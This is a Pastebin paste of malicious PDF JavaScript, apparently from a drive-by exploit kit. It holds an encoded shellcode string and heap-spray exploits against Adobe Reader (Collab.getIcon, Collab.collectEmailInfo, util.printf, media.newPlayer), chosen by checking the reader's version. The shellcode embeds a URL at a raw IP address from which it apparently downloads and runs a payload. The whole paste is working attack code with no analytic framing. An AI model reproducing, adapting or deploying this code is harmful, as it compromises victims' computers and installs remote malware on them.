Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //shellcode strings.... bjsg='%u8366%ufce4%u85fc%u75e4%ue934%u335f%u64c0%u408b%u8b30%u0c40%u708b%u561c%u768b%u3308%u66db%u5e8b%u033c%u3374%u812c%u15ee%uff10%ub8ff%u408b%uc330%u3946%u7506%u87fb%u2434%ue485%u5175%uebe9%u514c%u8b56%u3c75%u748b%u7835%uf503%u8b56%u2076%uf503%uc933%u4149%uadfc%uc503%udb33%ube0f%u3810%u74f2%uc108%u0dcb%uda03%ueb40%u3bf1%u751f%u5ee6%u5e8b%u0324%u66dd%u0c8b%u8d4b%uec46%u54ff%u0c24%ud88b%udd03%u048b%u038b%uabc5%u595e%uebc3%uad53%u688b%u8020%u0c7d%u7433%u9603%uf3eb%u688b%u8b08%u6af7%u5905%u98e8%uffff%ue2ff%ue8f9%u0000%u0000%u5058%u406a%uff68%u0000%u5000%uc083%u5019%u8b55%u8bec%u105e%uc383%uff05%u68e3%u6e6f%u0000%u7568%u6c72%u546d%u16ff%uc483%u8b08%ue8e8%uff61%uffff%u02eb%u72eb%uec81%u0104%u0000%u5c8d%u0c24%u04c7%u7224%u6765%uc773%u2444%u7604%u3372%uc732%u2444%u2008%u732d%u5320%uf868%u0000%uff00%u0c56%ue88b%uc933%uc751%u1d44%u7700%u6270%uc774%u1d44%u2e05%u6c64%uc66c%u1d44%u0009%u8a59%u04c1%u8830%u1d44%u4104%u6a51%u6a00%u5300%u6a57%uff00%u1456%uc085%u1675%u006a%uff53%u0456%u006a%ueb83%u530c%u56ff%u8304%u0cc3%u02eb%u13eb%u8047%u003f%ufa75%u8047%u003f%uc475%u006a%ufe6a%u56ff%ue808%ufe9c%uffff%u4e8e%uec0e%ufe98%u0e8a%u6f89%ubd01%uca33%u5b8a%uc61b%u7946%u1a36%u702f%u7468%u7074%u2f3a%u392f%u2e33%u3931%u2e30%u3434%u312e%u3737%u632f%u6f6c%u6573%u7473%u392f%u7938%u3866%u3139%u6633%u696a%u6770%u696a%u6c61%u6768%u3238%u3933%u676a%u6769%u6e68%u686a%u6934%u6b36%u6f35%u702e%u7068%u703f%u6676%u6472%u333d%u3a30%u6e31%u313a%u3a69%u6931%u333a%u2633%u7a75%u7868%u3d70%u6b31%u313a%u3a66%u7732%u313a%u3a6d%u3133%u313a%u3a6f%u6c31%u313a%u3a6c%u3033%u333a%u2631%u7179%u3d71%u6831%u6a26%u636b%u616c%u6d75%u3d6f%u6c65%u786e%u2665%u696a%u7a65%u636f%u676c%u793d%u6864%u006f%u0000';
- // Two exploit of
- //(1) Collab.getIcon Exploit CVE-2009-0927 , and
- //(2) Collab.collectEmailInfo CVE-2007-5659
- function ezvr(ra,qy)
- {
- while(ra.length*2<qy)
- {
- ra+=ra
- }
- ra=ra.substring(0,qy/2);
- return ra
- }
- function bx()
- {
- var dkg=new Array();
- var vw=0x0c0c0c0c;
- var addr=0x400000;
- var payload=unescape(bjsg);
- var sc_len=payload.length*2;
- var qy=addr-(sc_len+0x38);
- var yarsp=unescape("%u9090%u9090");
- yarsp=ezvr(yarsp,qy);
- var count2=(vw-0x400000)/addr;
- for(var count=0;count<count2;count++)
- {
- dkg[count]=yarsp+payload
- }
- var overflow=unescape("%u0c0c%u0c0c");
- while(overflow.length<44952)
- {
- overflow+=overflow
- }
- this.collabStore=Collab.collectEmailInfo(
- {
- subj:"",msg:overflow
- }
- )
- }
- function printf()
- {
- nop=unescape("%u0A0A%u0A0A%u0A0A%u0A0A");
- var payload=unescape(bjsg);
- heapblock=nop+payload;
- bigblock=unescape("%u0A0A%u0A0A");
- headersize=20;
- spray=headersize+heapblock.length;
- while(bigblock.length<spray)
- {
- bigblock+=bigblock
- }
- fillblock=bigblock.substring(0,spray);
- block=bigblock.substring(0,bigblock.length-spray);
- while(block.length+spray<0x40000)
- {
- block=block+block+fillblock
- }
- mem=new Array();
- for(i=0;i<1400;i++)
- {
- mem[i]=block+heapblock
- }
- var num=12999999999999999999888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888888;
- util.printf("%45000f",num)
- }
- function geticon()
- {
- var arry=new Array();
- if(app.doc.Collab.getIcon)
- {
- var payload=unescape(bjsg);
- var hWq500CN=payload.length*2;
- var qy=0x400000-(hWq500CN+0x38);
- var yarsp=unescape("%u9090%u9090");
- yarsp=ezvr(yarsp,qy);
- var p5AjK65f=(0x0c0c0c0c-0x400000)/0x400000;
- for(var vqcQD96y=0;vqcQD96y<p5AjK65f;vqcQD96y++)
- {
- arry[vqcQD96y]=yarsp+payload
- }
- var tUMhNbGw=unescape("%09");
- while(tUMhNbGw.length<0x4000)
- {
- tUMhNbGw+=tUMhNbGw
- }
- tUMhNbGw="N."+tUMhNbGw;
- app.doc.Collab.getIcon(tUMhNbGw)
- }
- }
- aPlugins=app.plugIns;
- var sv=parseInt(app.viewerVersion.toString().charAt(0));
- for(var i=0;i<aPlugins.length;i++)
- {
- if(aPlugins[i].name=='EScript')
- {
- var lv=aPlugins[i].version
- }
- }
- if((lv==9)||((sv==8)&&(lv<=8.12)))
- {
- geticon()
- }
- else if(lv==7.1)
- {
- printf()
- }
- else if(((sv==6)||(sv==7))&&(lv<7.11))
- {
- bx()
- }
- else if((lv>=9.1)||(lv<=9.2)||(lv>=8.13)||(lv<=8.17))
- {
- function a()
- {
- util.printd('p@111111111111111111111111 : yyyy111',new Date())
- }
- var h=app.plugIns;
- for(var f=0;f<h.length;f++)
- {
- if(h[f].name=='EScript')
- {
- var i=h[f].version
- }
- }
- if((i>8.12)&&(i<8.2))
- {
- c=new Array();
- var d=unescape('%u9090%u9090');
- var e=unescape(bjsg);
- while(d.length<=0x8000)
- {
- d+=d
- }
- d=d.substr(0,0x8000-e.length);
- for(f=0;f<2900;f++)
- {
- c[f]=d+e
- }
- a();
- a();
- try
- {
- this.media.newPlayer(null)
- }
- catch(e)
- {
- }
- a()
- }
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement